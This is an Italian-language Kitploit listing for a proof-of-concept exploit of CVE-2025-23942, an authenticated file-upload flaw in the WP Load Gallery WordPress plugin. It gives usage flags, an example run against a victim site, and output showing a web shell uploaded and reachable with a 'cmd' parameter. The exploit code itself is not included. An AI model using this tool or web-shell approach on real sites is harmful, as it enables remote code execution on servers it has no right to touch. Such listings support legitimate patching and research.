Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-23942-poc — WP Load Gallery <= 2.1.6 - Caricamento File Arbitrario Autenticato (Autore+) | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-23942-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-23942-poc

CVE-2025-23942-poc

WP Load Gallery <= 2.1.6 - Caricamento File Arbitrario Autenticato (Autore+)

Vedi Repository
351 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

WP Load Gallery Exploit (CVE-2025-23942)

📌 Descrizione

Vulnerabilità di caricamento senza restrizioni di file con tipo pericoloso in NgocCode WP Load Gallery che permette di caricare una Web Shell su un server web. Questa vulnerabilità riguarda WP Load Gallery: da n/a fino a 2.1.6.

⚠️ Dettagli della vulnerabilità

  • CVE ID: CVE-2025-23942
  • Plugin interessato: WP Load Gallery
  • Versioni interessate: Fino a 2.1.6
  • Tipo di vulnerabilità: Caricamento file senza restrizioni
  • Gravità: Critico (9.1 CVSS)
  • Vettore d'attacco: Esecuzione remota di codice (RCE) autenticata (Autore+)
  • Patch disponibile: ❌ (Nessuna patch ufficiale ancora)

🚀 Caratteristiche dell'exploit

✅ Sfruttamento automatizzato – Estrae il nonce, effettua l'accesso e carica automaticamente la shell.
✅ Controllo versione – Conferma se il target è vulnerabile prima dello sfruttamento.
✅ Gestione errori – Garantisce un'esecuzione fluida anche in caso di fallimenti.
✅ Gestione sessione – Utilizza una gestione persistente della sessione per l'autenticazione.
✅ Feedback in tempo reale – Fornisce output ad ogni passo.

🛠️ Requisiti

  • Python 3.x
  • Modulo requests (pip install requests)
  • Un account WordPress Author+ valido sul sistema target

🔥 Utilizzo

Esegui lo script con i parametri necessari:

usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password

Esempio:

python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123

📝 Esempio di output

   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Controllo versione del plugin...
[+] Versione rilevata: 2.1.6
[+] Il target è vulnerabile! Procedo con lo sfruttamento...
[+] Accesso effettuato con successo.
[+] Estrazione del wplg_nonce...
[+] wplg_nonce estratto: a1b2c3d4e5
[+] Caricamento della shell...
[+] File caricato con successo!
[+] Shell accessibile a: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id

📜 Dichiarazione di non responsabilità

Questo exploit è inteso solo per scopi educativi e di ricerca sulla sicurezza. Non usarlo su sistemi di cui non sei il proprietario o per cui non hai esplicito permesso di test. L'autore non è responsabile per qualsiasi uso improprio di questo script. ( Khaled_alenazi )

Scarica lo strumento